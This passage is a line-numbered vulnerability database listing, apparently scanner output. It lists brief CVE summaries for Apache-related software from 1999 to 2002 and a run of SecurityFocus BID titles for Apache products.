12959| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
12960| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
12961| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
12962| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
12963| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
12964| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
12965| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
12966| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
12967| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
12968| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
12969| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
12970| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
12971| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
12972| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
12973| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
12974| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
12975| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
12976| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
12977| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
12978| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
12979| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
12980| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
12981| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
12982| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
12983| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
12984| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
12985| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
12986| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
12987| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
12988| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
12989| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
12990| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
12991| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
12992| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
12993| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
12994| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
12995| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
12996| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
12997| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
12998| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
12999| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13000| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13001| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13002| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13003| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13004| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13005| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13006| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13007| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13008| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13009| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13010| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13011| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13012| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13013| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13014| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13015| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13016|
13017| SecurityFocus - https://www.securityfocus.com/bid/:
13018| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13019| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13020| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13021| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13022| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13023| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13024| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13025| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13026| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13027| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13028| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13029| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13030| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13031| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13032| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13033| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13034| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13035| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13036| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13037| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13038| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13039| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13040| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13041| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13042| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13043| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13044| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13045| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13046| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13047| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13048| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13049| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13050| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13051| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13052| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13053| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13054| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13055| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13056| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13057| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13058| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13059| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13060| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13061| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13062| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13063| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13064| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13065| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13066| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13067| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13068| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13069| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13070| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13071| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13072| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13073| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13074| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13075| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13076| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13077| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13078| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13079| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13080| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13081| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13082| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13083| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13084| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13085| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13086| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13087| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13088| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13089| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13090| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13091| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13092| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13093| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13094| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13095| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13096| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13097| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13098| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13099| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13100| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13101| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13102| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
13103| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
13104| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
13105| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
13106| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
13107| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
13108| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
13109| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
13110| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
13111| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
13112| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
13113| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
13114| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
13115| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
13116| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
13117| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
13118| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
13119| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
13120| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
13121| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
13122| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
13123| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
13124| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
13125| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
13126| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
13127| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
13128| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
13129| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
13130| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
13131| [100447] Apache2Triad Multiple Security Vulnerabilities
13132| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
13133| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
13134| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
13135| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
13136| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
13137| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
13138| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
13139| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
13140| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
13141| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
13142| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
13143| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
13144| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
13145| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
13146| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
13147| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
13148| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
13149| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
13150| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
13151| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
13152| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
13153| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
13154| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
13155| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
13156| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
13157| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
13158| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
13159| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
13160| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
13161| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
13162| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
13163| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
13164| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
13165| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
13166| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
13167| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
13168| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
13169| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
13170| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
13171| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
13172| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
13173| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
13174| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
13175| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
13176| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
13177| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
13178| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
13179| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
13180| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
13181| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
13182| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
13183| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
13184| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
13185| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
13186| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
13187| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
13188| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
13189| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
13190| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
13191| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
13192| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
13193| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
13194| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
13195| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
13196| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
13197| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
13198| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
13199| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
13200| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
13201| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
13202| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
13203| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
13204| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
13205| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
13206| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
13207| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
13208| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
13209| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
13210| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
13211| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
13212| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
13213| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
13214| [95675] Apache Struts Remote Code Execution Vulnerability
13215| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
13216| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
13217| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
13218| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
13219| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
13220| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
13221| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
13222| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
13223| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
13224| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
13225| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
13226| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
13227| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
13228| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
13229| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
13230| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
13231| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
13232| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
13233| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
13234| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
13235| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
13236| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
13237| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
13238| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
13239| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
13240| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
13241| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
13242| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
13243| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
13244| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
13245| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
13246| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
